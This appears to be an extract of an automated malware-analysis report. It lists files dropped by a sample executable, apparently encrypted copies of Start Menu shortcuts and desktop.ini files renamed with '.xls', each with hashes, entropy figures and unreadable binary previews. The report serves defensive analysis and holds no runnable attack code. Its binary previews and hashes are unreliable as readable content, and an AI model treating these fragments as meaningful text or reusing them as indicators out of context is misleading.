                                                                                                                                                      Preview: o..,qI..._].1..#r..byK.E..Ap...x...Z>G.u...e.a...C....&..GcW......{.....h...|(E.\.6.e...D...g.q.?&...;)......jC..y.....A.@......A.:......%<...S..@'r...B.7........c...........-F\.]....kh.......i..I$.'4.......x] hE.....L.13..l........?..=:...wN....u.*..g6..p...7...n.:.=7w.....[Pf^...i.$.s.>1......X.......(C.[...,...VEu...v.kQ.l...b....J.c...:..N|.`.x..yf.T..9o......b.>y..3.+.b..JR8n ...C.?*F..[..Z..:N..S..U9.*.r:.5.o...d..f..t.-d.}P./.W.g.T........I. pa].5....#]Z.....9.<Ha..%...1.\..4q0K...Q...v...<9.&$ ;.y.4...""g...*..+r.t.K..&c.|......N..z2..=6...}..v...`.E.c..\._b<.J..tQWz"........q._&...SBI...`N...[...Z..y...s...}...$P!..D.i...HVa......R.....E.*..IU.H4p...am...+.~Ny&.`1{d.B.=........s^b.$..p..O..V......x..\.....]..+...5O..=..#j.........b..w[...+lW....W...si.....Y.x7..iV".}WR.A../..50.el"...,cA......+....8.D...{$"=.uA..IR... ...{..v...;...#.0.X.Ot....?.4a'..%/kFr.....%.pR.Z...C,.*.:X9m.^..2.I../..$.T..m.=Q.....Y<..
                                                                                                                                                      C:\Users\user\SendTo\Mail Recipient.MAPIMail.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):960
                                                                                                                                                      Entropy (8bit):4.953861389103938
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:MTnGsNmzK8sevWAVgKTaCB7RZ0cHYIgtyUzJXhx:SnGsszCwgck38Sxx
                                                                                                                                                      MD5:E144EEF7364E5FE06756D4CCE555DD90
                                                                                                                                                      SHA1:73242D60D7F776088B5586B4519C31B0DA6A7365
                                                                                                                                                      SHA-256:ED517C542E7EBD7D1F59383FFAFB4458D5734D4F9949477A1FB5FEAB84FA839F
                                                                                                                                                      SHA-512:96927394C9F81D1CF55AEEF0ADD58D9E938F05767C7C1BDEF0802A01B1FD02E06598586D48021EDD27811F361E9390909FDD3DA4968D4711A7EC58D1646D0362
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .g..g..2..6i...-B.xA....=D..,......i.B....s....:R.O=....8G],..RK..M...Bw........z,..i..m.J"m;...J{......vk...v..Z.....p..T..*..?....W...N..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74..a.#..(.].)z.A8|...J7..qQ.+.NC..... O...K....A..
                                                                                                                                                      C:\Users\user\Start Menu\Programs\Accessibility\Desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1520
                                                                                                                                                      Entropy (8bit):6.5434476235107155
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:fZygOiHhBA2OWZe0b3Qu3PJ1H45am3izK8sevWAVgKTaCB7RZ0cHYIgtyUzEoEV:fUgOuB8WZem3Quc4/zCwgck38ka
                                                                                                                                                      MD5:C824115D952AD1937C406E448514204B
                                                                                                                                                      SHA1:D04F6AF3C8A562D3E66E00DF4676D8DF99AE2FA5
                                                                                                                                                      SHA-256:F8288D363692B39B5287AFFFC203083ED237D2EAA77C1CAE3377744AC2316E16
                                                                                                                                                      SHA-512:7E3B9EAA1163FB3F830D630B9356E9AA7C201EB25DD9022C0BF2E280C5E1273EDF95211C138CAD911FA878B26BFA957EE50CB160C5141E8D962F581E4CF37EC4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ty.4.>Iv.(.d8..B..kh./..........X.....j.i.,...Q...FY..S@.5.".|9.....nu..M.3&..".NV..%|..Q.g.:H..........m....4:.sT.(.C.I..M.9..jH.;...u.d..{.[.Z.0C..O..gA.3....P.E.Z...e.I.q....'}....{..5)k.;L..ZwI.Xx.%'.M."...R..E....#......+...Eb.9`s.j7..#.......!"...P.@Wj....LH&I.....O.b?...Q.&.,4z.<...bw...[.. i.i.......B...H.Q1i...b..m..={...3.<.E...M...[......pDY....k2Uq5k..`T.r........:(...~.l.\....8....X..\.....*...X'#.H%...Rp...-.v........j.S... .N..Mg..J......\...G...y|.......e...q..:...)..(C.O.2..k..]..&=.i...TO.....-(.e...,X....ZZ....=(.......t.B?5.p+..~,$.?..".q{q.4.H..B..*..V..2.i...8l.....S..i.'^.i..0/.P......h_.."u........I.ma.....O;=.^=..ja.p...%M.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5
                                                                                                                                                      C:\Users\user\Start Menu\Programs\Accessibility\Magnify.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2064
                                                                                                                                                      Entropy (8bit):7.070004809876532
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:bMRW+5u6htpFjU/slymvlHtBPpQ0txsrzCwgck38W:tQhtPFppP1vsrzTE1
                                                                                                                                                      MD5:D15761B093EAE8F99D7B49FE7BA50E9C
                                                                                                                                                      SHA1:49AFE83E987AC100685E87F2805DF8058AEE087A
                                                                                                                                                      SHA-256:22DDC51E686EA339F46FA46E9D6003C136EE85BA1841C6D57547EE75F32F0970
                                                                                                                                                      SHA-512:472CDA33BD091044EE05EF327C6336D8458F6B50E29D1CD875D0F837BC760E5E7FE6257323D4DE739F63F771CB8F913B5EF3BEE97DE590082C60C0BF93743649
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: p9............?4.A$.....t...d....<5./J.9I8...!0..>.........;.....WoP..+...@.....A...R.. ............97..J..F9.8.&n.v..3IXJ.m...U....?...!.%+>..r..!+SD'.t....1...J...E...#.|..E.7m...\m.^.V.v*...D...s.Y^...-.".4.w..+&Hv.)[_.H'O.V.*....W.&..a9.+2...el.c..}<...g."a..=...A.<q2.'.*84...C.>IQ.._7m.A9\b@^l....^1".{.f....B>>....n...GQ...........h0.T.C..5...Q..+..i..1...m..J....,..&Ds23..qa.r.e.xJ...,.D."o........`rl.2...R...-..p.E..h.st{$.ph.H..."v......a..X....B.....M..!..~..6..M.......6...3|.$P...........y.m..]d..k...'..L9/..A....Zg9(G.b."f......rj.Z..4 W..y......r.N(...oZ.4....~b..R....g^..`..c.>....z%.(..s..=....K..E&C.....3.....Pt......(.....-i....OO.z.,..J..~$......$...T.2b.5^...#.?...~b:A..\a46Q.FHYn..i]Eh9L..#f.....6%;a.c...[..i.......+....lO.\.'5...........=....~*s.w...!....O?j...W..Y4...9jm.|d08-.....F.d..L....v.p8f...'..O...H.w......^.Y...........>..".}.28i.h.y..ff..?..Y..pdV...\<I.L..q.w...I.m..>.t_...J{_...D......a9.
                                                                                                                                                      C:\Users\user\Start Menu\Programs\Accessibility\Narrator.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2064
                                                                                                                                                      Entropy (8bit):7.083853862357925
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:a3+GvRdklBQyo8OlKQ3wfQ5JzCwgck38hPn:grvOi8OlKQ3SQ5JzTECn
                                                                                                                                                      MD5:C7295A802B6FA45C8308D9AEA4BEFE3C
                                                                                                                                                      SHA1:E96CAD3764044FDCE0F5F34888F2B9E3A8BBEC1B
                                                                                                                                                      SHA-256:629F0CA70F6047211E76068523413F09BCB4FF5AC4A1B5E7D663954D0FDB654C
                                                                                                                                                      SHA-512:CC597A5AFADF8800013498F261CE63D6F02C8BD1B76B1439AB26B6414DE3DEB29BFA5D3925438C78D13439261D8218650C10BC9B10E0ED46EC9559A04061C14A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: !@zS...B..V..b...>..L...~....r._..o...$k.z.....j.......\.A.x..mA.k..x..p..g..f.*...2..O....z..T...x.B6...x.".ol..b8.k...m.+.M.L..Q..cBbhvj..hl m.>8...t..."... .}..hx?..jJ...o]..4..z.f.X......P..W....U.6....<&.r.......Z..e$.nl0.8.t...m.n..."..b._.@$.<..AV.*....P.G.L.a6Y...@.E..q.}..G....O.j1......^ ~h............Z..M.?f.......T.k.......,.?...Uy..[..1.Dg..H.....q......_......S0..s.......A..l..V.ca....K....C.9O.N....:e......?"...h&G....p..-}..u:M..Rb.!tW..v.q^P.L~T....b7d..v......:.(Y....W)X.z.<...n(...<A.*V%...F.._......?...~.q....}y....v....^...E.g...p:..........Y...8.l..+......M..l......Oe..<...z........X.g=......Y6.&...aL...u..l...b...Q...X.\.V............Z.....(.k..iyz..... . h.{O.k..@<..{ffz........[.......oY.M......p..LB.r..*.....<.lK.2L..IF". 7..~-..)'7.\aL..3./.S@>.W..m:..e..u(tq.z..hb..mJFt....r...U,..<...I...(.%3..9...U..u[i....&.A./.W....H'M...r.g.zI(Z....s./@...ex..............4...<?....=^.n.Z....;GS...[T&h..D..w....1....uh.u.1f.{..
                                                                                                                                                      C:\Users\user\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2064
                                                                                                                                                      Entropy (8bit):7.09076038997547
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:t5cua74Ghljo8ljubS0YwS8zCwgck38nb:k7dNazTEmb
                                                                                                                                                      MD5:CF9A9698A8C592CD041F2B41401DE344
                                                                                                                                                      SHA1:CFB19F892BEC91E3F7C03134EEFB91ABD5D93845
                                                                                                                                                      SHA-256:946F32CA03D9D9246B8E43490E736517073D33FC6A36C6BB4CD779E17CC17B7E
                                                                                                                                                      SHA-512:3FE5C4DF4E3722787E97648B57BD2063B656EA295CE1B8085B2273DEC6D2D66614A1D5272D55791BB9DDCA8F70231D01F946A141FE432E405EA41438BD5B9905
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .7v.u.2..k..).lW.q........yj.p.H.......-.3...O{..u.^T...Yb.|..P)\.....c.{...9...\.x......bs.....2...N...d..m..9_......l.....R.Vgc..\..8...I...B.5.......L....QbT1.}.4.1y";.#......=.`..ydW..L.&.P..hH.7K|G...!...LP..Z.|...wY.0.u..P>...{...c....7.h...x..}.T{?.....}..`S...E.RvFO`...\.........Q..[4.....7......oH*:.9...-.u{O.zrz.....u...p_.)..|9.OH./.E\......Oe.L.Y.v.yrZ.1..#.k.....Q..^o.fvxHEy..o...x...../..T..|.I..dl..e..Z...u.Xa.........){..+.. .L...3.p.B'9r9*]j.%....&.[.]P.e...W[.cQ......}x....K....l=........2..z.2........P.K.GL|._.O...4_..x....................6..y..L..L3..z.!.B.vI....v!...U..0.a.h...)rM.H=...#..m..X...`u..+.X....T>....'....g..G.lR......T0.Uz%.As...J....eH..h..BiURw.....7.}.l.L.8TG.(.m.z._H|Q...G6v:[.m.)u..W..y(...k..i............Mv4..DSx\.pt.@3p.G...G.<PG...`..k>.XWz.....ec*..F..=N;M.'. ....n...[....}.,.;A!.3l.I.3..<H.?'.oS.[.....MY.Y..]...M...L....;."...9..j.C6..5k...>...h3....O..B.U..u.e..c......8....*.S.\.d
                                                                                                                                                      C:\Users\user\Start Menu\Programs\Accessories\Desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1392
                                                                                                                                                      Entropy (8bit):6.294873345272201
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:szMEP+qGEpBClyRmZKLVhwu3zK8sevWAVgKTaCB7RZ0cHYIgtyUzAICqR:sz7P+qdu6mZKLwu3zCwgck38dVqR
                                                                                                                                                      MD5:93AA0BF927A8CFA7A148CB57A0B4C85E
                                                                                                                                                      SHA1:A314281B68FED3F986F30207BA98C7EFC42ACA6F
                                                                                                                                                      SHA-256:0D31B89595D97DDFED0E85EC5F6D813F02418C1F1A84A9CDAEAFC386BA2ACB7D
                                                                                                                                                      SHA-512:E178070D0FFAAA5BFFF541CCF6DF158B8A8D5E5A735751A1A4AABE3AA2B9309034E6869CA768B8651106F690884E69DA9518305E7C6EAE2C326352007F20C7AE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...e.x.X.i..L.{...U=<Ob..{..H1).R..'.U4.R]=4......g.r..r[YF../.k..5y..ZKq1V.f=..}.9..p+.'{$?T.m..g.4*.j..v#..........iD;.U....=+.7a......u..3.:..&...=./....m;_)#..w!lF.A..{.Mw.E..H..tX.(....J..K...G&..j.4..%p=..Gj.&...k.mTM..d.?;.3..i.....gNk..Q....i2W$.z..LL+[.......q...#b...Y..7Dd..!;9w..G......P4..t .......p..*.....t>.R.W..[..y.X..."......7.e..*.....+bu.B#K..$|....4....g..g..Ww.S0B..*0.4....Q.......d]...\.o...ECd.....m....K.8.Zys..g.5.4.{...Q...y.f.... x..[.H..*%..N.o.n..U3...0.I)..j.....S...8-_.V......A=..|..vd.U.9.r.}PP..].G`..N.ztVV..D.&I.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 9
                                                                                                                                                      C:\Users\user\Start Menu\Programs\Accessories\Internet Explorer.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2272
                                                                                                                                                      Entropy (8bit):7.163038173744728
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:3GyHHrDfJRRDR+voJtL1BpApTlzCwgck38Xjr:3LHLTJPaeRAPzTEQ
                                                                                                                                                      MD5:C5C2948156F4ACF050ABEB107F60B2A2
                                                                                                                                                      SHA1:0279185EA911D915502D5F36840C92BE5969D0B9
                                                                                                                                                      SHA-256:26AEEE219ED4BC176A8206F5B5509D072DD4F9F4D3E7E87ACE22AD13CF8332F1
                                                                                                                                                      SHA-512:7ADD4DA7E73BAB241A83080CE3DA2790DD48BF708757063F192897C0C01DE824395FCA27F47F992FDE985E84BE8789F2AD0931F7FB6DF28345254CC84EA287F2
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: u..P1.....0d.XC....,.x.Jv....o..`Y.%.r".p....)..E..i... &...b..W;.5..Q...e/...~.9L.(Z..P.,^...!W[.U,..v.XYl.U.Y"C..^._@..Y.+..3...L..f...|.....71..'..0F......oL ;.:..s.......ex...M..(.P..%7%S <..GI1Zl...p...#...*.%....D.@..n..l....d............W.Cz.8;.t...@../j...k..r>U.&..i[......\..EP.`.....d.3i.i.b..??..G..8Z.........S.i]A...uY..3...1.b..#eM4G.lj'...0.v%...$)....,T`.U..+].|...u..3_D....r..7.f.CsB.J..3...cN4$.%.QuN..Rm.".c....ob..@@.:~.|.f.Q...L.._.XD.o...)$.F.....R.=...`;6...%4V.I..>..I.~U.a=.\g.n.`.3......K..Z..@7..p..+{..]#...=...9n....k...[NFrG.k..p....*.ifh.c..........``/N.b....9.6...G...B..y ..k.M$..@/..8.....fr.(.z..\..{...d.."=..D...."....o.v..?..i..'......H.......d.s..4~gn....]...vR32A.@.@ i.......+.@...B._7l..2..K.T.`g>.....wNugW.wY..e5v\(p..F....P5B,.M...l[.%.3.. .8...'-...1...H..To...R.C-....ELd......Ff...P..ed..;.......o_Ud..^....~>5`}U.4.. .beb.X.i%....ZMw.4`|}^.}..;..l...Y.U......?.(.2..Xv>..&..:.."..Z.. m..e.S8.j.d~
                                                                                                                                                      C:\Users\user\Start Menu\Programs\Accessories\Notepad.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2112
                                                                                                                                                      Entropy (8bit):7.078954404403308
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:FrMFFlXOjdkQRrLWVlAvpOM4OEi+uzCwgck38Ij:2jlXORkQdLWLAvF1EizTEdj
                                                                                                                                                      MD5:1494F8D10844FA40F894A7741F9745EE
                                                                                                                                                      SHA1:77A16CACCA9932E430263E6EEEB8D7F9775E0AE8
                                                                                                                                                      SHA-256:B151026BA825E5272B2E983C0615F7545813483176683C1D909748AC0FC57A42
                                                                                                                                                      SHA-512:092B8BC24F149A8915DE3E17FFFD3A844220C06AEE0F5A16D708FDB363E007B400E5DE0489BA2F34161AD589E619AF4E484B2D8B2D1A4B3732F45B8C0FECE16C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .E.I.i'.i. .A....<.fW....q^i}...?iO.. Vb.&...B.w.F.};&.X..U......`.. '..?..l=..:4c..=.'\..X..Q. .p....PE..]sh..?.s.n..D+#.8.+&....9.ax....v..r..>..s.G.u.....EQ....?....".....c.<..eh.c.s._6.......G4.l.E..'0..kA...=...J.+n..Y.R..j.Y...v-.-...8Y....ubNi.)}*.5,%.*G?w'e.@..g.P]._.G4..|.Vz.Y2!.]n..D..*o.....U.50.u...X2U...z.U%.....o.5.8.U.t.H#....~'K....>il........>..?\g#.........Rn..m......Gf......*...d/.....]...R.KB.e...T...XI.&A.dY....._.........R..".m...(.../.e.7.+.....k.._u.i......-..E....Al....>..Mn.........%.%..N.I.X......g.**......h)...~...v.K..8U*..e.. Yk7.A+ab\..K.......)........J.......S..O!.B.V...7......q................$........k..i.}.V......7.....7?..^..s_A...ca.$.b(.Yhx*. ...a.XLb.2....&\..N......Fl..c...x....x&R.xN.wxX......v,...jo.4f0K..9.+3d`.P......9.....e...>.~..u....L...8O.F.g.....s.x..>..fT...ev..!.$..l....?.b)-..@H.Ea..Q...)..n.->...`.bB...<L.5.......*.VZ.....D. .UI...Y*.Q"n...:...5.r.c.D...s.`...@YEj.]...
                                                                                                                                                      C:\Users\user\Start Menu\Programs\Administrative Tools\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.680136071572608
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:VcDn/MgM8FfePBzK8sevWAVgKTaCB7RZ0cHYIgtyUzXr:V4dspzCwgck38C
                                                                                                                                                      MD5:F245EFA8F85C3370191E8412B7C25E75
                                                                                                                                                      SHA1:8529FE9B937FD94FE074AEF2186959FA462F1EB9
                                                                                                                                                      SHA-256:21AAFAD08DCF1FA2DBB9310F7D4D43DC072ECBB4C768CDA3718592F82AFEBA3F
                                                                                                                                                      SHA-512:132270679EEDAA528C19CC77E5181C3CF4F972C35418724EEC321A750DCDB8D61FDF03E0F12A6F527822CBBA6B85FF2CFA319C0C48256BA191F41AC9B6F79FDD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .....N..K....>.m.R.4.y}Js......h..^.Y.....U.....<.R...F.2.$....B`........]..wP(.....n....m...A."S.}z2...o.j.P..5$.-.........0v....#T./....e.#..^...M8m............gH.s..(..p.h..YW.....!..P..S..I{.|..^}...w...n.~.G....Q.K...=eJ..z.....*....[.....O..I.+.}.S. .j~n..........0.GhG...q.*..VU...U67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\user\Start Menu\Programs\Maintenance\Desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.620426831895631
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:NlnIBTdHsF8YAzK8sevWAVgKTaCB7RZ0cHYIgtyUznx8gSrRXP:NlnCjYAzCwgck38mx85P
                                                                                                                                                      MD5:6F9C841397842BB65CF845C724BD58F9
                                                                                                                                                      SHA1:4A3B02C1C2568A3175763E9C9AAD11171A322D91
                                                                                                                                                      SHA-256:2EE83960C2C6F180664686031BA6DF3A31767F04271D1963DE355C4FBCEA2E8D
                                                                                                                                                      SHA-512:8ABEACF05EB6FE055088A9B7AAA04BAA3E8634B7C8202A5B6C5D796B729992AE9E9F326937DCEF78B3B7099DE1A10211BBBFE4D518AA04C999A5FA81B0F62211
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..Z.{.K.4.....A......Ta.....*].g*8[z...:.p.d>M3<.3.A....".v..D.f..8.5eG.E=.<.W.RF.-N.hK.\.y.P7..X....L.}.Q...KU...,......X.j,.N......@DH_.i..+q...:.p&T.#..C..94.-..c...S.j).g..g...:}..AG.N<..../y.f...xN...<..n.:y....6cR.X.........gZ3DO........?$8.\.....&<.(y....`.x...r...D.....-...k.~67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\user\Start Menu\Programs\Startup\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.630899513507742
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:3BaMomzCVMvxLgwF7eOxzK8sevWAVgKTaCB7RZ0cHYIgtyUzS:nCVep6azCwgck387
                                                                                                                                                      MD5:7E272654996F176E265FE3272E504A0B
                                                                                                                                                      SHA1:7C1B110B2232F052461D0F26316A674A464CF8FA
                                                                                                                                                      SHA-256:1BC743A35340678840C01A287E341275BFA1892960387C91997BA54BB13C6BAB
                                                                                                                                                      SHA-512:C9BF894116D559A26599F380E0EA54C92AEE9565D2C039A5858795332AFB7AF1B87F84679187D022DFD43D0AEC6A3C1B59FCFB16AA063447B562BAEBB12D00E5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: `....]..~......+....E..*..p..uc.(.+0I....$l.NK..u.Q.S.......<a$...%..!..2....;. z.$..r..:P....s.\...a........r.}C\.....I.OZ ....{@./..P.....)........P._.r3.C...v...g.>....h.w}-.C...z....s............<.5...-.........o...\!..g...b...]..vx.z,uA...)F`.wb......]...Z...o..[*.DWp...oKz.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\user\Start Menu\Programs\System Tools\Command Prompt.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2096
                                                                                                                                                      Entropy (8bit):7.084589720470217
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:mzUG24JfJiRtCz11cWuVKjkHEMlzCwgck38dy:mzG4JfJiTCzLNu4QpzTEyy
                                                                                                                                                      MD5:0D35A8A616BEAB41550C38AA8E30F5BA
                                                                                                                                                      SHA1:48DC5BCD6265DB248C511742192C1313FBCD8B0E
                                                                                                                                                      SHA-256:2A620532110A8D19A8B79218C5A54C6B8E572611891FB74D33CB7502CFD2DA06
                                                                                                                                                      SHA-512:C4ED3ACC18774DE7282155B8A5225ABFB7CF4280EE687F0B5674C4E66C705AD49F1E59877B13ECB668AE88784341E27C0AE92877EF831064C0BA5597A537D5E5
                                                                                                                                                      Malicious:false
